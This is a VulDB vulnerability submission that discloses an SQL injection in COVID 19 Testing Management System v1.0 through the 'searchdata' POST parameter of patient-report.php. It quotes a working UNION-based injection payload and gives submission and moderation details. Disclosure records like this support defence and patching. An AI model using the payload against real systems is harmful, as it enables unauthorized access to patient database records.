| Title | COVID 19 Testing Management System v1.0 /covid-tms/patient-report.php post parameter searchdata exists SQL injection vulnerability |
|---|
| Description | An issue was discovered in COVID 19 Testing Management System v1.0.
There is a SQL injection that can directly issue instructions to the background database system via /covid-tms/patient-report.php post parameter searchdata.
Payload:searchdata=1') UNION ALL SELECT NULL,NULL,CONCAT(0x71727374,0x31323334,0x61626364),NULL,NULL,NULL,NULL-- -&search=Search |
|---|
| Source | ⚠️ https://github.com/mhz2846415362/bug_report/blob/main/vendors/unyasoft/COVID%2019%20Testing%20Management%20System/SQLi-1.md |
|---|
| User | hertz216 (UID 42587) |
|---|
| Submission | 03/09/2023 10:23 (3 years ago) |
|---|
| Moderation | 03/09/2023 22:30 (12 hours later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 222661 [SourceCodester COVID 19 Testing Management System 1.0 POST Parameter patient-report.php searchdata sql injection] |
|---|
| Points | 19 |
|---|